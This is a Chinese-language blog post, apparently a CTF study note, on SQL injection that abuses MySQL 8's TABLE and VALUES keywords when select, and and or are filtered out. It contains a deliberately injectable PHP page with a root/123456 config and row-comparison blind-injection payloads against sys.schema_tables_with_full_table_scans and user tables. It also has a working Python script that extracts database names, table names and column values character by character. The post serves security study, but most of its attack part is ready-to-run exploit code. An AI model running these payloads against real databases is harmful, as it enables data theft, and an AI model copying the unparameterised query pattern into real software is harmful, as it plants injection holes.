mysql8 新特性注入

最新推荐文章于 2023-02-19 15:30:00 发布
最新推荐文章于 2023-02-19 15:30:00 发布
阅读量939 收藏 1
点赞数
分类专栏: PHP 文章标签: php ctf 安全 web mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/126062322
版权

一篇文章弄懂mysql8新特性注入 - SecPulse.COM | 安全脉搏

 如何安装新版本mysql8:

mysql8.0.20安装配置教程 - mysql安装配置教程 - 博客园

Table 关键字

table关键字的语法:

TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

其作用是直接列出表的整个内容:

与SELECT的区别:

1.TABLE始终显示表的所有列 2.TABLE不允许对行进行任意过滤,即TABLE 不支持任何WHERE子句 

VALUES

VALUES关键字可直接通过给出值的方式直接组成一个表

VALUES ROW(1,2,3),ROW(1,1,1),ROW(1,2,3);

可以利用联合注入

字符比较

(table information_schema.TABLESPACES_EXTENSIONS limit 6,7);

 返回结果是user/users 

 

数字比较

盲注利用

可以采用 table 和 小于号进行盲注,table 始终显示表的所有列,我们可以注其中一个字段,这里过滤了 or 所以打算采用另一个存储数据库名和表单名的视图 sys.schema_tables_with_full_table_scans, 这个视图本身的数据少方便我们搜寻,过滤了 and 和 or 可以采用 && 或者 ||

盲注库名 

 

 盲注表名

查询出有四个字段,所以构造比较时候也要四个

第一个是库所以这个方法也可以爆库名,第二个是表,需要查表名就控制第二个字段

 当字符大小超过正确表名时,无回显

 

 字段数量

逐个字段内容

 最后一个字段很特殊,最后一个字段的最后一个字符,第一次不回显的结果正确

也就是当最后一次回显时候+1是正确结果

 

例题:

index.php

<?php
require "config.php";

$conn = mysqli_connect($dbhost,$dbuser,$dbpass,$dbname);

highlight_file(__FILE__);
$id = isset($_POST['id']) ? $_POST['id'] : 1;
if (preg_match("/(select|and|or)/i", $id) == 1) {
    die("MySQL version: " . $conn->server_info);
}
$data = $conn->query("SELECT username from users where id = $id");
foreach ($data as $users) {
    echo($users['username'] );
}

config.php

<?php
// config.php
$dbhost = '127.0.0.1';       // mysql服务器主机地址
$dbuser = 'root';           // mysql用户名
$dbpass = '123456';          // mysql用户名密码
$dbname = 'user';         // mysql数据库
$conn = mysqli_connect($dbhost,$dbuser,$dbpass,$dbname);
?>

库:user 表:users

 

 爆库:

 字符比较来盲注库名,表名:

id = -1 ||('user','users','','')<(table sys.schema_tables_with_full_table_scans limit 0,1);

盲注字段内容:

id = 0 ||('1','zhangsan','123456')<(table users limit 0,1);

脚本:

# -*-coding:utf-8-*-
import requests

def bind_sql():
    flag = ""
    dic = "~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/-,+*)(&%$#!"
    for i in range(1000):
        f = flag
        for j in dic:
            _ = flag + j
            #payload = "id=0||(binary'{}','',3,4)<(table/**/sys.schema_tables_with_full_table_scans/**/limit/**/0,1)".format(_)
            #payload = "id=0||('user',binary'{}',3,4)<(table/**/sys.schema_tables_with_full_table_scans/**/limit/**/1,1)".format(_)


            payload = "id=0||(binary'{}','')<(table/**/ctf/**/limit/**/0,1)".format(_)
            #payload = "id=0||('2','lisi',binary'{}')<(table/**/users/**/limit/**/1,1)".format(_)
            #payload = "id=0||('2',binary'{}','')<(table/**/users/**/limit/**/1,1)".format(_)
            #print(payload)
            data = {
                "id": payload
            }
            res = requests.post(url=url, data=data)
            if 'zhangsan' in res.text:
                # 匹配字段最后一位需要加1, 也就是匹配出 admim 其实是 admin
                if j == '~':
                    flag = flag[:-1] + chr(ord(flag[-1])+1)
                    print(flag)
                    exit()
                flag += j
                print(flag)
                break
        if flag == f:
            break
    return flag

if __name__ == '__main__':
    # input url
    url = 'http://localhost:8088/study/mysql8/'
    result = bind_sql()
    print(result)

ThnPkm
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用于 node.js 的快速 mysqljs/ mysql兼容mysql驱动程序
06-04
2. **兼容性强**:全面支持 MySQL 5.x 和 MySQL 8.x 版本,确保在不同的 MySQL 版本下都能正常运行。 3. **连接池支持**:内置连接池管理,可以有效地复用数据库连接,提升性能和资源利用率。 4. **异步操作**:支持...
MYSQL8.0特性—无select注入
Innocence_0的博客
08-15 174
mysql8.0之后又有了一个新特性,可以在过滤select的情况下,爆出我们需要的表名、字段、数据。
mysql的values使用_MySQL的SQL语句 - 数据操作语句(16)- VALUES 语句
热门推荐
weixin_36254564的博客
01-19 1万+
VALUES 语句VALUES 是 MySQL 8.0.19 中引入的一个 DML 语句,它以表的形式返回一个或多个行的集合。换句话说,它是一个表值构造器,也可以作为独立的 SQL 语句来运行。1. VALUES row_constructor_list [ORDER BY column_designator] [LIMIT BY number]2.3. row_constructor_list:...
深入浅出了解MYSQL8特性注入是什么
Java_LingFeng的博客
11-17 569
今天给大家带来的是MYSQL8版本的特性注入,说起SQL注入大家一定不陌生,可是你有没有想过,当SQL注入中最关键的函数SELECT被过滤后,我们要如何去执行SQL语句呢,这就是本文要讲的内容,即利用MYSQL8版本的特性来进行关键字的绕过注入
一篇文章弄懂mysql8新特性注入
蚁景网安学院
11-16 917
前言最近打比赛的时候遇到了mysql8的知识点,这里就从环境搭建开始到注入一起一步步慢慢学习。环境搭建我这里是用docker在服务器上拉的,然后用navicat来看的下载docker pu...
鲜为人知的MySQL语法介绍(230518+TABLE 和 VALUES ROW 语法)
我的博客
12-09 2652
本文介绍一些MySQL中比较鲜为人知的语法,包括:\、->、->>、savepoint、any()、all() nullif() TABLE VALUES ROW()等
MySQL8.0关键字相关问题
你就像甜甜的益达
09-08 587
后面知道rank是关键字,然后对于关键字的插入只需要两边加入tab建上面得`符号就可以进行插入,但是不建议使用关键字作为字段;查询mysql库下的help_keyword表查询一下即可,
MySQL也可以实现分词搜索(FULLTEXT)
weixin_44001317的博客
10-16 5018
MySQL使用Ngram解析器实现分词搜索
MySQL系统SYS数据库——各类统计视图整理
发现问题,面对问题,分析问题,解决问题,总结问题
11-16 3856
查看表的统计信息,默认情况下按照增删改查操作的总表I/O延迟时间(执行时间,即也可以理解为是存在最多表I/O争用的表)降序排序 查看不活跃的索引(没有任何事件发生的索引,这表示该索引从未使用过),默认情况下按照schema名称和表名进行排序 查看表的统计信息,默认情况下按照增删改查操作的总表I/O延迟时间(执行时间,即也可以理解为是存在最多表I/O争用的表)降序排序 查看不活跃的索引(没有任何事件发生的索引,这表示该索引从未使用过),默认情况下按照schema名称和表名进行排序
【网安干货】MySQL8新特性注入技巧
HBohan的博客
08-17 1864
新增的表 information_schema.TABLESPACES_EXTENSIONS 从mysql8.0.21开始出现的, table 关键字出现的比较早,在8.0.19之后就有了,所以如果想要使用,还是先要试试这个表有没有,如果 mysql 版本正好在 8.0.19-8.0.21 之间的话,就无法使用了 这个表好用就好用在,它直接存储了数据库和数据表 mysql> table information_schema.TABLESPACES_EXTENSIONS; +-----------
Cetus MySQL数据库中间件-其他
06-12
主要功能特性:Cetus分为读写分离和分库(分表是分库的一种特殊形式)两个版本。针对读写分离版本:多进程无锁提升运行效率支持透明的后端连接池支持SQL读写分离增强SQL路由解析与注入支持prepare语句支持结果集压缩...
深入了解SQL注入
12-15
1 .什么是sql注入(Sql injection)? Sql注入是一种将sql代码添加到输入参数中,传递到Sql服务器解析并执行的一种攻击手法 2. 怎么产生的? Web开发人员无法保证所有的输入都已经过滤 ...Mysql的注释特性: #与
MySQLDBA运维笔记.pdf
11-04
mysql 总结........................................................................................................................................6 1.1 数据库的种类.......................................
在线答疑系统(jsp+ssm+mysql.x).zip
最新发布
04-03
Spring框架提供了依赖注入和面向切面编程等特性,简化了Java应用的开发。SpringMVC是基于MVC模式的轻量级Web框架,可以方便地实现URL到Controller的映射,快速搭建Web应用。MyBatis是一款优秀的持久层框架,可以帮助...
无 select SQL注入
aloneBUThappy的博客
12-20 3267
无 select SQL注入
ISCC,Web:Easy-SQL
Pai_Space
05-25 2361
select 等被过滤,绕不过 id=1 至 8 有一些信息 id=8 时 用 sqlmap 可以查到数据库是 Mysql 8 Mysql 8 存在 table 注入 浅谈利用mysql8新特性进行SQL注入 - 安全客,安全资讯平台 测是否存在 http://59.110.159.206:7010/?id=-1 union table users limit 0,1 存在,可以利用,由于 id=8 时提示查邮件,看看是否存在 email 回显了 email,查 b
深入浅出带你学习MYSQL8特性注入
Spontaneous_0的博客
02-19 169
深入浅出带你学习MYSQL8特性注入
MySQL插入数据的多种方式
天涯何处无芳草,相逢何必曾相识。
02-06 9946
这里如果提示不允许也需要修改配置文件【注意:不太建议开启 ,记得及时关闭,有安全风险!使用命令行方式导入数据,这种方式比较简单,百度搜一下即可。这种方式首先得准备好要插入的数据文档,然后进行插入
sql 注入mysql 和 sqlserver 中有哪些区别?
03-07
MySQL 和 SQL Server 中,SQL 注入的原理是相同的,都是利用用户输入的数据来构造恶意 SQL 语句,从而实现对数据库的非法操作。但是,由于两种数据库的语法和特性不同,导致在实际应用中,SQL 注入的方式和防范措施也有所不同。一般来说,SQL Server 对于 SQL 注入的防范要比 MySQL 更加严格,例如在存储过程中使用参数化查询等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值